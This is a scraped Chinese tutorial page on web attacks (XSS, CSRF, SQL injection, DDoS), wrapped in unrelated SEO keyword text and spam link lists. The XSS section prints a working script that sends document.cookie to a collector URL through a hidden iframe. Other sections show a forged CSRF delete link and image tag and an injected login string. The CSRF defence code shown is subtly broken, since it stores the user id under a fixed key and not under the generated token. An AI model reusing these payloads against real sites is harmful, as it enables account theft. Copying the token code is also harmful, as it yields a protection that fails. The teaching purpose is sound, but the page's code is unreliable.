当前位置: 首页 > news >正文

从化网站制作网站排名查询

从化网站制作,网站排名查询,wordpress 驱动,百度推广费XSS:跨站脚本(Cross-site scripting) XSS 全称“跨站脚本”,是注入攻击的一种。其特点是不对服务器端造成任何伤害,而是通过一些正常的站内交互途径,例如发布评论,提交含有 JavaScript 的内容文…

XSS:跨站脚本(Cross-site scripting)

XSS 全称“跨站脚本”,是注入攻击的一种。其特点是不对服务器端造成任何伤害,而是通过一些正常的站内交互途径,例如发布评论,提交含有 JavaScript 的内容文本。这时服务器端如果没有过滤或转义掉这些脚本,作为内容发布到了页面上,其他用户访问这个页面的时候就会运行这些脚本。

可能只是简单的恶作剧

while (true) {alert("你关不掉我~");
}

也可以是盗号或者其他未授权的操作

<!-- 用 <script type="text/javascript"></script> 包起来放在评论中 -->
<script type="text/javascript">
(function(window, document) {// 构造泄露信息用的 URLvar cookies = document.cookie;var xssURIBase = "http://localhost:2000/myxss/";var xssURI = xssURIBase + window.encodeURI(cookies);// 建立隐藏 iframe 用于通讯var hideFrame = document.createElement("iframe");hideFrame.height = 0;hideFrame.width = 0;hideFrame.style.display = "none";hideFrame.src = xssURI;// 开工document.body.appendChild(hideFrame);
})(window, document);
</script> 

预防

不要相信用户提交的内容,对提交的字符串进行过滤。

CSRF:跨站请求伪造(Cross-site request forgery)

CSRF 的全称是“跨站请求伪造”,而 XSS 的全称是“跨站脚本”。看起来有点相似,它们都是属于跨站攻击——不攻击服务器端而攻击正常访问网站的用户,但前面说了,它们的攻击类型是不同维度上的分 类。CSRF 顾名思义,是伪造请求,冒充用户在站内的正常操作。我们知道,绝大多数网站是通过 cookie 等方式辨识用户身份(包括使用服务器端 Session 的网站,因为 Session ID 也是大多保存在 cookie 里面的),再予以授权的。所以要伪造用户的正常操作,最好的方法是通过 XSS 或链接欺骗等途径,让用户在本机(即拥有身份 cookie 的浏览器端)发起用户所不知道的请求。
严格意义上来说,CSRF 不能分类为注入攻击,因为 CSRF 的实现途径远远不止 XSS 注入这一条。通过 XSS 来实现 CSRF 易如反掌,但对于设计不佳的网站,一条正常的链接都能造成 CSRF。

例如

<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><title>Title</title>
</head>
<body>
<a href="http://localhost:2000/topic/delete?id=1">点击领取金币
</a>
<img src="http://localhost:2000/topic/delete?id=1">
</body>
</html>

当用户访问页面就会用用户的账号进行操作

预防

设置令牌


csrf_tokens = dict()@main.route("/")
def index():# board_id = 2board_id = int(request.args.get('board_id', -1))if board_id == -1:ms = Topic.all()else:ms = Topic.find_all(board_id=board_id)token = str(uuid.uuid4())u = current_user()csrf_tokens['token'] = u.idbs = Board.all()return render_template("topic/index.html", ms=ms, token=token, bs=bs)@main.route("/delete")
def delete():id = int(request.args.get('id'))token = request.args.get('token')u = current_user()# 判断 token 是否是我们给的if token in csrf_tokens and csrf_tokens[token] == u.id:csrf_tokens.pop(token)if u is not None:print('删除 topic 用户是', u, id)Topic.delete(id)return redirect(url_for('.index'))else:abort(404)else:abort(403)
<a class="topic_title" href="{{ url_for('topic.delete', id=t.id, token=token) }}">删除
</a>

SQL注入

所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。

例如

def select(conn):# 一个注入的用户名usr = 'abc" or "1"="1'pwd = 'abc'sql = '''SELECTid, username, emailFROMusersWHEREusername="{}" and password="{}"'''.format(usr, pwd)# 读取数据cursor = conn.execute(sql)print('所有数据', list(cursor))# for row in cursor:#     print(row)

预防

永远不要信任用户的输入,对用户的输入进行校验,不要使用动态拼装sql。

DDOS攻击

DDOS 里面的 DOS 是 denial of service(停止服务)的缩写,表示这种攻击的目的,就是使得服务中断。最前面的那个 D 是 distributed (分布式),表示攻击不是来自一个地方,而是来自四面八方,因此更难防。
举例来说:应该类似攻击餐馆门口的前台排号机(Gateway),很少真的过去消费。300个人混在30个真实客户里面,然后取完号(Token)就走,过了号继续取号,前台每次都必须叫三遍这个号才能过号,结果就是想消费的客户一直在等待,前台一直忙着叫号和过号。

预防

  • 专用硬件,Web 服务器的前面可以架设硬件防火墙,专门过滤请求。
  • 本机防火墙,操作系统都带有软件防火墙,Linux 服务器一般使用 iptables。
  • Web 服务器, 如:nginx,Apache可以过滤请求
http://www.yayakq.cn/news/847035/

相关文章:

  • 河北住房和城乡建设厅官方网站网站建设制作团队
  • 常见的电子商务网站有哪些做响应式网站用什么框架
  • 网站建设交易平台移动做绩效的网站
  • 微网站建设需付费吗广州信科做网站
  • 重庆平台网站建设国家域名注册中心
  • 某物流网站后台源码app技术
  • 有哪些网站做的很好用凡科网做网站怎么保存到桌面
  • 北京高端网站公司哪家好哪些群体对网站开发有需求
  • 还有做网站的必要吗百度关键词数据
  • 顶顶呱网站建设房地产图文制作网站
  • 网站制作设计报价用html做网页
  • 公司网站维护教程石家庄网络平台推广
  • 国际购物网站有哪些设计企业网站多少钱
  • 做网站有关机械的图片可以用vs做网站建设吗
  • dw做网站首页怎么做2015做啥网站能致富
  • 网站建设维护公司资质怎么做网站咨询
  • 商业网站建设心得体会php商务网站开发
  • 南康区城乡规划建设局网站哈尔滨城乡建设局网站
  • 毕节市网站建设58同城wordpress百度收录
  • wordpress 默认主题站点关于营销方面的网站
  • 苏州哪里做网站好阿里 网站建设
  • 网站首页ui海南网页设计公司排名
  • 做搜狗网站优化排名软购物网站开发将商品导入数据库
  • 没有备案的网站可以用ip访问吗做网站的规范尺寸
  • ppt网站建设的目的可以做动画的网站有哪些
  • 襄阳作风建设年网站襄樊门户网站建设
  • 网站客户案例网站的页面风格是什么
  • 网站建设无法访问网站wordpress公众号管理员
  • 网站建设商务广州玩的地方有哪些地方
  • 百度验证网站所有权怎样做公司的网站